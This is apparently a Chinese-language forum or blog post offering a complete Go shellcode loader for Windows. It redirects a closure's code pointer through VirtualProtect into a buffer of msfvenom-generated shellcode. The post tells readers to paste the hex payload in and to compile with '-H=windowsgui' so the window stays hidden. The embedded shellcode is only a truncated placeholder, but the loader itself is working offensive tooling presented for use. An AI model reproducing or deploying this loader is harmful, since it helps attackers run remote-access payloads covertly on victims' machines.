整理了下网上的代码,最后合并到一个代码文件即可使用,无需额外的包
package main
import (
"encoding/hex"
"fmt"
"os"
"os/signal"
"syscall"
"unsafe"
)
// procVirtualProtect resolves kernel32!VirtualProtect lazily: the DLL is loaded
// and the export looked up on the first Call, not at program start.
// syscall.NewLazyDLL exists only in the Windows build of package syscall, so
// this file compiles with GOOS=windows only.
// NOTE(review): kernel32.dll is already mapped into every process, so a bare
// name is fine here; for any other DLL a bare name is subject to search-order
// hijacking and a system-DLL loader would be preferable.
var procVirtualProtect = syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualProtect")
// VirtualProtect is a thin wrapper over kernel32!VirtualProtect. It changes the
// protection of the dwSize bytes starting at lpAddress to flNewProtect and
// stores the previous protection through lpflOldProtect (callers in this file
// pass the address of a uint32). It reports whether the call succeeded; the
// Win32 error code returned by Call is deliberately not surfaced.
func VirtualProtect(lpAddress unsafe.Pointer, dwSize uintptr, flNewProtect uint32, lpflOldProtect unsafe.Pointer) (ok bool) {
	// Each pointer-to-uintptr conversion stays inside the call expression, as
	// the syscall package conventions expect, rather than being staged in
	// temporaries first.
	r1, _, _ := procVirtualProtect.Call(uintptr(lpAddress), dwSize, uintptr(flNewProtect), uintptr(lpflOldProtect))
	ok = r1 != 0
	return ok
}
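// Run transfers control to shellcode from the calling goroutine.
//
// Mechanism (unchanged from the original): a Go func value is a pointer to a
// "funcval" whose first word is the code address. Run takes the address of an
// empty closure's funcval, makes that word writable, overwrites it with the
// address of the shellcode buffer, makes the buffer executable, and then calls
// the closure so the indirect call lands in the shellcode.
//
// Differences from the original: the result of every VirtualProtect call is
// checked and an error is returned before any write or jump happens, instead
// of writing through a possibly read-only page or jumping into non-executable
// memory; an empty buffer is rejected up front; and after the code pointer has
// been written the funcval word is returned to its previous protection (best
// effort) so that page is not left RWX. Callers that ignore the returned error
// still compile.
//
// Run only returns if the shellcode itself returns. The payload executes on
// the calling goroutine's stack — NOTE(review): confirm that stack is large
// enough for the payload in use; this code does not enlarge it.
func Run(shellcode []byte) error {
	// PAGE_EXECUTE_READWRITE, as in the original. NOTE(review): the funcval
	// word is only written, never executed, so a non-executable protection
	// may suffice for it; left as RWX because the page it lives on may be
	// shared with code.
	const pageExecuteReadWrite uint32 = 0x40
	wordSize := unsafe.Sizeof(uintptr(0))

	if len(shellcode) == 0 {
		// Nothing to jump to; the original would have written whatever the
		// empty slice's data pointer was and called it.
		return fmt.Errorf("Run: empty shellcode")
	}
	// Address of the first byte; identical to the slice header's data word.
	codeAddr := uintptr(unsafe.Pointer(&shellcode[0]))

	// stub's value is a pointer to the closure's funcval; fv points at that
	// funcval's first word, the code pointer. Taking &stub (not just calling
	// it) keeps the compiler from turning stub() into a direct call.
	stub := func() {}
	fv := *(**uintptr)(unsafe.Pointer(&stub))

	// 1. Make the shellcode buffer executable. VirtualProtect works at page
	//    granularity, so every page the buffer touches changes protection.
	//    The API needs somewhere to store the old protection even though it is
	//    not used afterwards.
	var oldCodeProt uint32
	if !VirtualProtect(unsafe.Pointer(&shellcode[0]), uintptr(len(shellcode)), pageExecuteReadWrite, unsafe.Pointer(&oldCodeProt)) {
		return fmt.Errorf("Run: VirtualProtect on shellcode buffer (%d bytes) failed", len(shellcode))
	}

	// 2. Make the funcval's code-pointer word writable and redirect it.
	var oldFnProt uint32
	if !VirtualProtect(unsafe.Pointer(fv), wordSize, pageExecuteReadWrite, unsafe.Pointer(&oldFnProt)) {
		return fmt.Errorf("Run: VirtualProtect on closure funcval failed")
	}
	*fv = codeAddr

	// 3. Best effort: put the funcval page back to its previous protection.
	//    Failure here only leaves the page RWX; execution still proceeds.
	var scratch uint32
	VirtualProtect(unsafe.Pointer(fv), wordSize, oldFnProt, unsafe.Pointer(&scratch))

	// 4. Calling stub now jumps to codeAddr.
	stub()
	return nil
}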
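// main decodes the embedded hex-encoded shellcode, runs it on a separate
// goroutine, and keeps the process alive until a signal is delivered.
//
// Differences from the original: the signal channel is buffered, which
// signal.Notify requires (an unbuffered channel can drop the signal and is
// flagged by go vet), and a decode failure now reports the reason on stderr
// instead of exiting silently — which is exactly what happens when the
// placeholder string below is compiled unchanged.
func main() {
	// Paste the msfvenom hex output here. The placeholder contains "..." and
	// therefore does not decode.
	const hexStr = "fc4883e4...56ffd5"

	// signal.Notify needs a buffered channel; no signals listed means every
	// incoming signal is relayed.
	sigs := make(chan os.Signal, 1)
	signal.Notify(sigs)

	go func() {
		shellcode, err := hex.DecodeString(hexStr)
		if err != nil {
			fmt.Fprintln(os.Stderr, "decoding shellcode:", err)
			os.Exit(1)
		}
		Run(shellcode)
	}()

	// Block until the first signal arrives; that ends the program.
	<-sigs
}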
在hexStr处粘贴上msfvenom生成的hex格式shellcode字符串(例如使用 -f hex 输出),编译运行即可。注意:代码使用 syscall.NewLazyDLL,只能以 Windows 为目标编译,且 Go 的目标架构需与 payload 的架构一致。
如果要隐藏运行窗口的话,需要在编译的时候使用以下参数
go build -ldflags "-s -w -H=windowsgui" main.go